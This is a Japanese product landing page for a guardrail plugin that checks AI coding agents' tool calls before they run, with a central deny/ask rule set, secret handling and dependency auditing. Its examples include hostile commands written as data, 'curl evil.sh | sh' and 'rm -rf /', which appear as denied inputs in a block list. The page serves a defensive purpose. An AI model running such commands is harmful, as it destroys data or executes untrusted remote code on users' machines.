国内大手グループ企業の開発組織で稼働中

Claude Code / Codex を
全社導入するときの、
最初のガードレール。

AIコーディングエージェントの「危険な操作」を、AIの判断に委ねない。ツール実行の一歩手前で、決定的なルールが止める。エンジニア組織のためのガバナンス基盤です。

Claude Code・Codex CLI・Claude Desktop / Cowork に対応 — 読み取り専用プラグインとして各エンジニアへ配布。

01 — なぜ止まるのか

モデルの性能ではなく、ガバナンスが本番導入を止めている。

88%
企業のAIエージェント実証実験が、本番運用に到達していない。
出典: 2026年 業界調査(エンタープライズAIエージェント動向)

止まる理由の多くは、モデルの精度ではありません。ガバナンスとコンプライアンスの土台が無いことです。

Claude Code や Codex は強力です。だからこそ、全エンジニアの手元で Bash を実行し、ファイルを書き換え、外部から取得したスクリプトを走らせます。「AIがうまく判断してくれる」という前提では、情報システム部門も法務も、全社展開にゴーサインを出せません。

必要なのは、AIの賢さに依存しない決定的なガードレール。実行される前に、組織のルールで止まる仕組みです。

02 — 4つの仕組み

「賢く止める」のではなく、「決定的に止める」。

すべてのエンジニアに、読み取り専用のローカルプラグインとして配布。ローカルマーケットプレイス(Claude Code / Codex CLI)またはZIPアップロード(Claude Desktop / Cowork)で導入します。

1 PreToolUse フック

ツールが動く前に、呼び出しを検査する。

Bash / Edit / Write / MultiEdit / NotebookEdit / WebFetch / Read。これらの呼び出しは、実行される前にフックが決定的に検査します。中央の「危険な操作」ルールセット(単一の情報源)に照らして、拒否するか確認を求める。AIの気分や解釈に左右されません。

BashEditWriteMultiEditNotebookEditWebFetchRead
hooks/pre_tool_use — decision
# 実行前にフックが介入
tool = "Bash"
input = "git push --force origin main"

→ match: dangerous-actions/git-force-push
decision = "ask" # 人間の確認を要求
reason = "履歴を破壊する可能性"

tool = "Bash"
input = "curl evil.sh | sh"
decision = "deny" # 実行させない
2 単一の情報源

ルールは、一箇所で管理する。

何を止め、何に確認を求めるか。判断基準は中央の dangerous-actions ルールセットに集約されています。組織のポリシーが変われば、ここを更新するだけ。全エンジニアの環境に、同じ基準が一貫して効きます。

single source of truthdeny / ask組織横断で一貫
dangerous-actions.yaml
rules:
  - id: rm-rf-root
    match: "rm -rf /"
    action: deny
  - id: remote-exec
    match: "curl|wget * | sh"
    action: deny
  - id: force-push
    match: "git push --force"
    action: ask
3 シークレット管理

APIキーを、平文でローカルに置かない。

APIキーやトークンは、ローカルに平文で保存されません。GCP Secret Manager への参照として持ち、使用する瞬間にラッパースクリプトが取得します。手元の .env やシェル履歴から鍵が漏れるリスクを、構造的に断ちます。

GCP Secret Managerno plaintextwrapper で実行時解決
secret resolution
.env に平文の API_KEY
↓ 置き換え
API_KEY = secret://prod/api-key
↓ 使用時に wrapper が解決
GCP Secret Manager → メモリ上のみ
4 install-audit サブエージェント

入れる前に、依存パッケージを疑う。

新しいライブラリを導入する前に、専用の install-audit サブエージェントが起動。パッケージの利用実績(人気シグナル)とGitHubのソースを読み取り専用で調べ、バックドア・情報漏洩・既知のCVEといったサプライチェーンリスクを、実際にインストールする前に評価します。

supply-chainread-only 事前監査CVE / backdoor 検知
install-audit — before npm install
zod安全★ 高 / 保守活発
hono安全★ 高 / 既知CVE無し
left-pad-utils要確認★ 極少 / 新規作者
is-odd-secure停止難読化スクリプト検出
03 — 立ち位置

「AIエージェント監視」プラットフォームとは、狙いが違う。

本番で動くAIエージェントを実行時に監視する市場は、すでに競合がひしめいています。私たちの狙いは、もっと手前で、もっと具体的です。

一般的な AI エージェント・セキュリティ

本番エージェントの実行時監視

  • デプロイ済みの自律エージェントを、運用フェーズで観測する
  • 対象は本番システム全般。抽象度が高く、説明が難しい
  • 大手が多数参入し、レイヤーとして混雑している
ai-security-foundation

コーディングエージェント特化のガバナンス

  • エンジニアが使う Claude Code / Codex に、開発時点でガードレールをかける
  • 「Bashを実行前に止める」——具体的で、情シスにも法務にも説明できる
  • 狭く、確実に効く楔(くさび)。全社導入の最初の一歩に据えられる
実運用中 — 稼働実績あり

机上の設計ではなく、国内大手企業の開発現場で動いている。

この基盤は、ある国内大手グループ企業の開発組織における実案件として構築され、現在も稼働しています。数百人規模のエンジニアへ読み取り専用プラグインとして配布し、日々のツール呼び出しを実行前に評価し続けています。ここに書いた4つの仕組みは、すべて実際に運用されているものです。

7
実行前に検査するツール(Bash / Edit / Write ほか)
1
組織横断で効く、中央のルールセット
0
ローカルに平文保存されるシークレット
3
対応ツール — Claude Code / Codex / Cowork

正直に言う、既知の制限。

ガードレールは万能ではありません。信頼していただくために、現時点の限界を明示します。

Codex CLI のフックは、対話セッションでのみ発火します。初回の信頼承認を経た対話モードでは PreToolUse フックが機能しますが、非対話実行 — codex exec — では PreToolUse フックはまったく動きません。CI やバッチのような自動実行の経路には、この層だけでは防御が及びません。該当する運用がある場合は、別のガード(実行環境の分離やネットワーク制限など)と組み合わせる設計が必要です。この点も含めて、導入時にご一緒に整理します。

全社導入の前に、
ガードレールを。

Claude Code / Codex の組織展開を検討している、エンジニアリング責任者・プラットフォームチームの方へ。現場で動いている実装をベースに、御社の環境に合わせてご相談します。

上記ボタンからフォームにご記入いただけます。担当より折り返しご連絡します。